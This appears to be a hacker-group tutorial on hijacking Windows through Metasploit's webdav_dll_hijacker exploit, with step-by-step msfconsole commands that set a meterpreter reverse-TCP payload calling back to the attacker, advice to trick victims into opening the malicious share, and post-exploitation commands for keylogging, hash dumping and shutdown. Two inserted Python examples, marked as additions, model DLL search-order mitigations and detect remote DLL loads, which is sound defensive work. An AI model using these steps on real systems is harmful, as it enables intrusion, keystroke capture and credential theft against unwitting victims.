
Greetz :

H4x0R 5uD!P ( D1617 64 ), Th3 cr3aT0r, SsilentIntruder, D-Intruder, ix_WarRior, Cyb3r Inj3ct0r, TOXCIFI3D Hax0r, HEARTOFSILICON, KidD3 H@ck3r, DevIl SP33D, Lon3ly H4cK3r, Phoenix64, Bl4cK 34gl3, lequid 3xploit3r, N-coder, 73rm!n470r h4cker, 0Ut Sid3r, and all members of Team InDI hEx

Indian Cyber Police: AP3X, HACK0, C0D3 INJ3CT0R, YASH, CODED32 AND ALL.

HUGS TO: AP3X AND H4CK0, T.O.F, MCA, GCA, ICA, ICH, AND ALL INDIAN HACKING GROUPS

Author
Un_N0n Antil0g
Team Indihex (Admin)
Indian Cyber Police (Core Member)

[#] ~ Team Indihex -> https://www.facebook.com/pages/Indi-HeX/379631892050858?ref=ts

[#] ~ Indian Cyber Police -> https://www.facebook.com/indian.cyber.police?ref=ts

INTRODUCTION
This book will tell you some basics of the hijacking exploits that are present in Back|Track.
Hijacking is one of the most interesting ways to break into the security of a website or Windows OS.

[#] ~ What is Hijacking ?


Hijacking is a type of network security attack in which the
attacker takes control of a communication - just as an airplane
hijacker takes control of a flight - between two entities and
masquerades as one of them. In one type of hijacking (also
known as a man in the middle attack), the perpetrator takes
control of an established connection while it is in progress. The
attacker intercepts messages in a public key exchange and then
retransmits them, substituting their own public key for the
requested one, so that the two original parties still appear to be
communicating with each other directly. The attacker uses a
program that appears to be the server to the client and appears
to be the client to the server. This attack may be used simply to
gain access to the messages, or to enable the attacker to
modify them before retransmitting them.

Another form of hijacking is browser hijacking, in which a user is
taken to a different site than the one the user requested. There
are two different types of domain name system (DNS) hijacking.
In one, the attacker gains access to DNS records on a server
and modifies them so that requests for the genuine Web page
will be redirected elsewhere - usually to a fake page that the
attacker has created. This gives the impression to the viewer
that the Web site has been compromised, when in fact, only a
server has been. In February 2000, an attacker hijacked RSA
Security's Web site by gaining access to a DNS server that was
not controlled by RSA. By modifying DNS records, the attacker
diverted requests to a spoof Web site. It appeared to users that
an attacker had gained access to the actual RSA Web site data
and changed it - a serious problem for a security enterprise.
This type of hijacking is difficult to prevent, because
administrators control only their own DNS records, and have no
control over upstream DNS servers. In the second type of DNS
hijack, the attacker spoofs valid e-mail accounts and floods the
inboxes of the technical and administrative contacts.

[#] ~ Hijacking Windows.

Now our real topic starts.
I will perform this exploit on Windows XP.
You can try it on Windows Vista and Windows 7 too.

I am using Back|Track R2 KDE.

Target is -> Windows XP machine.

So, time to start the real work.

[#] ~ Exploit working.

The exploit I am using is webdav_dll_hijacker.
Location of the exploit in Back|Track ->
exploit/windows/browser/webdav_dll_hijacker

So what is a DLL here? Certain files in Windows depend upon DLLs. When you open a file like .txt, it opens in Notepad, but certain files require a DLL to run. If there is no DLL present alongside them, Windows goes to windows/system32 to get the specified DLL.
In this case, Metasploit will substitute that DLL file so that the exploit can work. As a result, HIJACKING takes place.
Normally, Windows tries to find the DLL in the same folder as the program you are running, but if it is not there, it will go to system32 etc.
So this discussion shows the nature of this EXPLOIT :D !
We will substitute the DLL that Windows wants with the DLL that Back|Track sends.
SO THIS IS HOW THIS EXPLOIT WORKS
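
The search behaviour described above, and the registry settings that change it, as an added example that is not part of the original document. It goes slightly beyond the text by modelling the full default order and the role of the current working directory (the opened share); the function names, directory names and DLL names are constructed, while SafeDllSearchMode and CWDIllegalInDllSearch are the real Windows settings under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager.

```python
# Added illustration: simplified model of the Windows DLL search order (sample data).
LOCAL, UNC, WEBDAV = "local", "unc", "webdav"
CWD_REMOVED = 0xFFFFFFFF  # CWDIllegalInDllSearch: drop the CWD from the search
SYSTEM_DIRS = [r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows"]

def search_order(app_dir, cwd, path_dirs, safe_dll_search_mode=True):
    """Ordered (role, directory) pairs searched for a DLL requested by bare name."""
    system = [("system", d) for d in SYSTEM_DIRS]
    path = [("path", d) for d in path_dirs]
    if safe_dll_search_mode:                      # default: CWD after system dirs
        return [("app", app_dir), *system, ("cwd", cwd), *path]
    return [("app", app_dir), ("cwd", cwd), *system, *path]

def cwd_allowed(cwd_kind, cwd_illegal):
    """System-wide CWDIllegalInDllSearch policy applied to the current directory."""
    if cwd_illegal == CWD_REMOVED:
        return False
    if cwd_illegal == 1:                          # block WebDAV working directories
        return cwd_kind != WEBDAV
    if cwd_illegal == 2:                          # block any remote working directory
        return cwd_kind not in (WEBDAV, UNC)
    return True                                   # 0 or unset: default behaviour

def resolve(dll, files, app_dir, cwd, cwd_kind, path_dirs=(),
            safe_dll_search_mode=True, cwd_illegal=0):
    """Return the path the modelled loader would pick, or None if nothing matches."""
    for role, d in search_order(app_dir, cwd, path_dirs, safe_dll_search_mode):
        if role == "cwd" and not cwd_allowed(cwd_kind, cwd_illegal):
            continue
        if dll.lower() in files.get(d, set()):
            return d + "\\" + dll
    return None

# Constructed scenario: a document opened from a share makes the share the CWD.
APP = r"C:\Program Files\Viewer"
SHARE = r"\\fileserver.example\documents"
FILES = {
    APP: {"viewer.exe"},
    r"C:\Windows\System32": {"shared.dll"},
    SHARE: {"contact.txt", "helper.dll", "shared.dll"},
}

def demo(cwd_kind=WEBDAV):
    """Resolution of helper.dll under each CWDIllegalInDllSearch setting."""
    return {v: resolve("helper.dll", FILES, APP, SHARE, cwd_kind, cwd_illegal=v)
            for v in (0, 1, 2, CWD_REMOVED)}

if __name__ == "__main__":
    print(demo())
```

With the default value 0 the modelled loader falls through to the share; values 1, 2 and 0xFFFFFFFF stop it there, and value 1 alone does not cover a plain UNC working directory.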

So, what are you waiting for?

Start your BACK|TRACK.
So guys, let's do it.

[#] ~ STEPS TO HIJACK.

So, for this attack:

1 -> Open a terminal and type in msfconsole.
msfconsole is a part of Metasploit, which is pre-installed in Back|Track.

2 -> When msfconsole has started, type in
use exploit/windows/browser/webdav_dll_hijacker

3 -> Now type
set payload windows/meterpreter/reverse_tcp
This will set your payload.

4 -> Type in set basename (enter any name here)
Basename is the name given to the files that are used for hijacking.

5 -> Type in
set extensions wab txt grp vcf p7c
Then press Enter.

6 -> Type in
set LHOST (your IP here)

7 -> Type in
set srvhost (your IP here)
Then press Enter.

8 -> Type in
set LPORT 7777
Then press Enter.

9 -> Finally, everything is ready.
Now, time to attack.
Type in exploit
Then press Enter.

As you can see in the screenshot, the server has started.

Now, time for some social engineering, if you know what I mean :P .

Now you can clearly see that when the exploit is started, it gives the address where the infected files are available for the attack.
For example: \\10.10.10.131\documents\
Now, using some social engineering skills, make the victim open that link in his/her Windows.

When he/she opens it, some files appear. Those files contain the PAYLOAD, which will start when one of them is double-clicked.

Five files appear, named contact. I have used basename = contact.
So these files have the PAYLOAD in them. When one is double-clicked, it starts, and thus a session opens in Back|Track.
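
What the step above looks like from the target side is a process loading a module from a remote share. The following added example (not part of the original document) flags such loads in records shaped like Sysmon Event ID 7 (image loaded) fields; the sample records, helper.dll and the files.example host are constructed, and only the \\10.10.10.131\documents\ path comes from the text.

```python
import re

# Added illustration. Records are constructed, shaped like Sysmon Event ID 7
# (image loaded) fields; helper.dll and the host names are placeholders.
EVENTS = [
    {"Image": r"C:\Program Files\Viewer\viewer.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
    {"Image": r"C:\Program Files\Viewer\viewer.exe",
     "ImageLoaded": r"\\10.10.10.131\documents\helper.dll", "Signed": "false"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"\\files.example@80\DavWWWRoot\docs\helper.dll",
     "Signed": "false"},
    {"Image": r"C:\Tools\app.exe",
     "ImageLoaded": r"\\files.example\tools\plugin.dll", "Signed": "true"},
]

# \\host[@port]\share\... ; the @port suffix and the DavWWWRoot pseudo-share
# are how the Windows WebDAV redirector writes HTTP-backed paths.
REMOTE = re.compile(r"^\\\\(?P<host>[^\\@]+)(?:@(?P<port>[^\\]+))?\\(?P<share>[^\\]+)\\")

def classify(path):
    """Return 'webdav', 'unc' or None (local) for a module path."""
    m = REMOTE.match(path)
    if not m:
        return None
    if m.group("port") or m.group("share").lower() == "davwwwroot":
        return "webdav"
    return "unc"

def findings(events):
    """Flag image loads from remote paths; unsigned remote modules rank high."""
    out = []
    for e in events:
        kind = classify(e["ImageLoaded"])
        if kind is None:
            continue
        severity = "high" if e.get("Signed", "false").lower() != "true" else "review"
        out.append((severity, kind, e["Image"], e["ImageLoaded"]))
    return sorted(out)

if __name__ == "__main__":
    for row in findings(EVENTS):
        print(*row, sep=" | ")
```

A WebDAV share reached through a path such as \\10.10.10.131\documents\ is indistinguishable from SMB by path alone, so the check treats every remote module load as worth review rather than only the DavWWWRoot form.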

After double-clicking on it:

You can clearly see that a meterpreter session is opened.
Now it's time to have some fun :P

Now type in

sessions -i 1

Then press Enter.

BAAM!! :P
Now type in help.
This will show the commands available, so you can execute them.
It's great fun using them.

[#] ~ SOME COMMANDS

1 - ifconfig
To see the IP config and info.

2 - keyscan_start
It will start a keylogger that will monitor all keystrokes on the target's machine.

3 - keyscan_dump
It will dump all keystrokes captured.

4 - keyscan_stop
It will stop capturing keystrokes.

5 - hashdump
It will dump all hashes present on the target machine.

6 - shutdown
It will shut down the target's machine.

There are many commands available.
Try them all.

HOPE YOU GUYS LIKE THIS PDF AND FIND IT HELPFUL

THANK YOU
[#] ~ Un_N0n Antil0g ~> LOGGING OUT
